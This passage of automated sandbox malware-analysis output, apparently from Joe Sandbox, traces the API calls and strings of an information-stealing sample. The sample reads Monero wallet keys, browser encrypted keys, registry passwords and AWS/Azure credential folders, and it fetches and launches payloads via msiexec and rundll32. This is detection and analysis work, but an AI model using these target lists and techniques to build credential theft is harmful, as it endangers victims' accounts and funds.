                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD2B2
                                  • lstrcat.KERNEL32(?,00BC148C), ref: 00BAD2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD2D4
                                  • lstrcat.KERNEL32(?,00BC1490), ref: 00BAD2E3
                                    • Part of subcall function 00BBA820: lstrlen.KERNEL32(00BA4F05,?,?,00BA4F05,00BC0DDE), ref: 00BBA82B
                                    • Part of subcall function 00BBA820: lstrcpy.KERNEL32(00BC0DDE,00000000), ref: 00BBA885
                                  • lstrlen.KERNEL32(?), ref: 00BAD32A
                                  • lstrlen.KERNEL32(?), ref: 00BAD339
                                    • Part of subcall function 00BBAA70: StrCmpCA.SHLWAPI(01409BC0,00BAA7A7,?,00BAA7A7,01409BC0), ref: 00BBAA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD3B4
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: c00ef9d192fc5f2f25873f4e953912c51d58edda4f1ee40ea515112b3a0e5c24
                                  • Instruction ID: 13af1cb22b8747132e18e1065f45b7eb1bbb022219d5c38d84c06434e84cc4ac
                                  • Opcode Fuzzy Hash: c00ef9d192fc5f2f25873f4e953912c51d58edda4f1ee40ea515112b3a0e5c24
                                  • Instruction Fuzzy Hash: ADE1F871D10209ABDB14FBA4DDA6EEE73B8AF14301F104198F106B61A1DE75BE09DB72
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0140F020,00000000,?,00BC144C,00000000,?,?), ref: 00BACA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BACA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00BACA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BACAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BACAD9
                                  • StrStrA.SHLWAPI(?,0140EE10,00BC0B52), ref: 00BACAF7
                                  • StrStrA.SHLWAPI(00000000,0140EF60), ref: 00BACB1E
                                  • StrStrA.SHLWAPI(?,0140F858,00000000,?,00BC1458,00000000,?,00000000,00000000,?,01409CC0,00000000,?,00BC1454,00000000,?), ref: 00BACCA2
                                  • StrStrA.SHLWAPI(00000000,0140F798), ref: 00BACCB9
                                    • Part of subcall function 00BAC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC871
                                    • Part of subcall function 00BAC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC87C
                                  • StrStrA.SHLWAPI(?,0140F798,00000000,?,00BC145C,00000000,?,00000000,01409CE0), ref: 00BACD5A
                                  • StrStrA.SHLWAPI(00000000,01409D90), ref: 00BACD71
                                    • Part of subcall function 00BAC820: lstrcat.KERNEL32(?,00BC0B46), ref: 00BAC943
                                    • Part of subcall function 00BAC820: lstrcat.KERNEL32(?,00BC0B47), ref: 00BAC957
                                    • Part of subcall function 00BAC820: lstrcat.KERNEL32(?,00BC0B4E), ref: 00BAC978
                                  • lstrlen.KERNEL32(00000000), ref: 00BACE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00BACE9C
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 787b3b3effc50de7d48b1518b4778e0a8c45dc8b55a3f12ba41b23d8b13b52e8
                                  • Instruction ID: 9edf7806dbb2d8786624138e16e47c0c5d90183431afc81c15bc38131e0e4466
                                  • Opcode Fuzzy Hash: 787b3b3effc50de7d48b1518b4778e0a8c45dc8b55a3f12ba41b23d8b13b52e8
                                  • Instruction Fuzzy Hash: C1E1D971D10109BBDB15EBA4DC96FFEB7B8AF14300F404199F106B6591EF706A4ACB62
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0140CD60,00000000,00020019,00000000,00BC05B6), ref: 00BB83A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB8426
                                  • wsprintfA.USER32 ref: 00BB8459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8499
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: eed3751cf4221eea522ba5410f027c401c5bad1edf60e51a5c7610a34d52648b
                                  • Instruction ID: 657d83e8e34bfa60d736d1c6551039d2d9aeb2717b0f968a89daf50c73793f58
                                  • Opcode Fuzzy Hash: eed3751cf4221eea522ba5410f027c401c5bad1edf60e51a5c7610a34d52648b
                                  • Instruction Fuzzy Hash: D381DC71910218ABDB24EB54CC95FEA77B8FF48700F0086D9E10AA6190DFB56F85CFA5
                                  APIs
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00BB4DCD
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB492C
                                    • Part of subcall function 00BB4910: FindFirstFileA.KERNEL32(?,?), ref: 00BB4943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00BB4E59
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FDC), ref: 00BB4971
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FE0), ref: 00BB4987
                                    • Part of subcall function 00BB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4B7D
                                    • Part of subcall function 00BB4910: FindClose.KERNEL32(000000FF), ref: 00BB4B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BB4EE5
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB49B0
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC08D2), ref: 00BB49C5
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB49E2
                                    • Part of subcall function 00BB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BB4A1E
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,01410FA0), ref: 00BB4A4A
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,00BC0FF8), ref: 00BB4A5C
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,?), ref: 00BB4A70
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,00BC0FFC), ref: 00BB4A82
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,?), ref: 00BB4A96
                                    • Part of subcall function 00BB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BB4AAC
                                    • Part of subcall function 00BB4910: DeleteFileA.KERNEL32(?), ref: 00BB4B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: e5bfe6cf22f8b31cb426f77d671bc0036d6fecbfc472f5d139fc213c4e0ee0c3
                                  • Instruction ID: 77e5e305a3e85a84d4fd06a4e220b5d924bc3d2331d54fb433b3c9e6302b3c53
                                  • Opcode Fuzzy Hash: e5bfe6cf22f8b31cb426f77d671bc0036d6fecbfc472f5d139fc213c4e0ee0c3
                                  • Instruction Fuzzy Hash: 7041737A94020867DB50F770DC87FED72B8AB65700F4048D8B585A61D2EEF497C98BA2
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BB906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: ead14f5ecf22a8859c482243712ab5f2b7cad516cfa720d03242b5974225d1eb
                                  • Instruction ID: fdf3bee1882758cd79c7ef5d15854497836b8f803a00c9415e1a78082b2ebeb7
                                  • Opcode Fuzzy Hash: ead14f5ecf22a8859c482243712ab5f2b7cad516cfa720d03242b5974225d1eb
                                  • Instruction Fuzzy Hash: FF71CB75D10209ABDB04EFE8DC89FEEB7F9AB48700F108548F615EB290DB74A945CB61
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB31C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB34EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: b6db571c35048a8efacd5e80bb30d0616c852edecb17ecddddd19754536fcf1c
                                  • Instruction ID: 34d385e4ab2e12777fd17288da4e008a9814ab1d7d87a20f157a810b05d6f72b
                                  • Opcode Fuzzy Hash: b6db571c35048a8efacd5e80bb30d0616c852edecb17ecddddd19754536fcf1c
                                  • Instruction Fuzzy Hash: B0129B71C10108ABDB15FBA0DCA2FFEB7B8AF14300F544199E50676591EFB46B4ACB62
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA6280: InternetOpenA.WININET(00BC0DFE,00000001,00000000,00000000,00000000), ref: 00BA62E1
                                    • Part of subcall function 00BA6280: StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6303
                                    • Part of subcall function 00BA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6335
                                    • Part of subcall function 00BA6280: HttpOpenRequestA.WININET(00000000,GET,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA63BF
                                    • Part of subcall function 00BA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA63D1
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5318
                                  • lstrlen.KERNEL32(00000000), ref: 00BB532F
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00BB5364
                                  • lstrlen.KERNEL32(00000000), ref: 00BB5383
                                  • lstrlen.KERNEL32(00000000), ref: 00BB53AE
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 6de0ce2df4aaebff5f9ef9b71439c2f6ace1a45d5db482f2d8f0e6920c79b0ee
                                  • Instruction ID: f04a80af83ee95b5c334778f89023f92c64336930b0763038691b2b9fae3aa2b
                                  • Opcode Fuzzy Hash: 6de0ce2df4aaebff5f9ef9b71439c2f6ace1a45d5db482f2d8f0e6920c79b0ee
                                  • Instruction Fuzzy Hash: 9D51CC70D10148AFCB24FF64CDA6BFD77B9AF10301F504498E4066A592EFB46B45CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 74dfcd97f89ab66523c2e5689db49561549884a0f3060f6ffb696f085b69566d
                                  • Instruction ID: e067bd9af57bfabcbaa79fa000187f86b912ea2a9835c73f37e99aa496a7eb8e
                                  • Opcode Fuzzy Hash: 74dfcd97f89ab66523c2e5689db49561549884a0f3060f6ffb696f085b69566d
                                  • Instruction Fuzzy Hash: 36C153B5D00219ABCB14EF64DCD9FEA77B8BB54304F0045D9E50AA7241DBB0AA85CFA1
                                  APIs
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB42EC
                                  • lstrcat.KERNEL32(?,01410958), ref: 00BB430B
                                  • lstrcat.KERNEL32(?,?), ref: 00BB431F
                                  • lstrcat.KERNEL32(?,0140F0B0), ref: 00BB4333
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BB8D90: GetFileAttributesA.KERNEL32(00000000,?,00BA1B54,?,?,00BC564C,?,?,00BC0E1F), ref: 00BB8D9F
                                    • Part of subcall function 00BA9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BA9D39
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB93C0: GlobalAlloc.KERNEL32(00000000,00BB43DD,00BB43DD), ref: 00BB93D3
                                  • StrStrA.SHLWAPI(?,01410A18), ref: 00BB43F3
                                  • GlobalFree.KERNEL32(?), ref: 00BB4512
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
                                    • Part of subcall function 00BA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9B2A
                                    • Part of subcall function 00BA9AC0: LocalFree.KERNEL32(?,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB44A3
                                  • StrCmpCA.SHLWAPI(?,00BC08D1), ref: 00BB44C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BB44D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BB44E5
                                  • lstrcat.KERNEL32(00000000,00BC0FB8), ref: 00BB44F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: e9ea036bc6aeba47e9e76f47f71de33138fe1c609c8ee68536c92f56c1f41c07
                                  • Instruction ID: de804dcdec7cfb4ae2b0824a0b890a1df6ea9e5341f00611dff636387355a616
                                  • Opcode Fuzzy Hash: e9ea036bc6aeba47e9e76f47f71de33138fe1c609c8ee68536c92f56c1f41c07
                                  • Instruction Fuzzy Hash: 1F7123B6900208ABDB14FBA4DC95FEE77BDAB58300F0445D8F605A7181EA74EB45CBA1
                                  APIs
                                    • Part of subcall function 00BA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                    • Part of subcall function 00BA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                    • Part of subcall function 00BA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                    • Part of subcall function 00BA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                    • Part of subcall function 00BA12A0: RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BA134F
                                  • lstrlen.KERNEL32(?), ref: 00BA135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00BA1377
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BA1465
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: cc2722c7173d858bc5682363e2924614c43adbb0304e7bc6bd7a3530b5dee0c2
                                  • Instruction ID: a189b16dbf79bfe682a15797095b953089b2fa72062e5b2480149bc53e83b2a5
                                  • Opcode Fuzzy Hash: cc2722c7173d858bc5682363e2924614c43adbb0304e7bc6bd7a3530b5dee0c2
                                  • Instruction Fuzzy Hash: 9E5146B1D501196BCB15FB60DDA2FFD73BC9F54300F4045D8B60AA6092EE706B89CBA6
                                  APIs
                                    • Part of subcall function 00BA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA733A
                                    • Part of subcall function 00BA72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA73B1
                                    • Part of subcall function 00BA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA740D
                                    • Part of subcall function 00BA72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BA7452
                                    • Part of subcall function 00BA72D0: HeapFree.KERNEL32(00000000), ref: 00BA7459
                                  • lstrcat.KERNEL32(00000000,00BC17FC), ref: 00BA7606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA7648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00BA765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA768F
                                  • lstrcat.KERNEL32(00000000,00BC1804), ref: 00BA76A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA76D3
                                  • lstrcat.KERNEL32(00000000,00BC1808), ref: 00BA76ED
                                  • task.LIBCPMTD ref: 00BA76FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: c52175cbfe956913f6f26faa33e55d84e955bb47fc2335900a1a0e4afc06eee8
                                  • Instruction ID: 38141b0a7320a21b14bdef5a8cce7f2c9ac416ab686caa7e6ad3f3155a7f810e
                                  • Opcode Fuzzy Hash: c52175cbfe956913f6f26faa33e55d84e955bb47fc2335900a1a0e4afc06eee8
                                  • Instruction Fuzzy Hash: 8D314F71D0824ADFCB04FBA8DCD5EFE73B8AB4A301B144158F102EB251DE34A946DB61
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01410730,00000000,?,00BC0E2C,00000000,?,00000000), ref: 00BB8130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BB8158
                                  • __aulldiv.LIBCMT ref: 00BB8172
                                  • __aulldiv.LIBCMT ref: 00BB8180
                                  • wsprintfA.USER32 ref: 00BB81AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: e27dd8161fd3bc9f0baabb834139e0675772caaee090cf541159536c6da40354
                                  • Instruction ID: ade4c40aef26a4c56b6a71a6f81656ff40fde063d5d97785eed5ba9d66c1feee
                                  • Opcode Fuzzy Hash: e27dd8161fd3bc9f0baabb834139e0675772caaee090cf541159536c6da40354
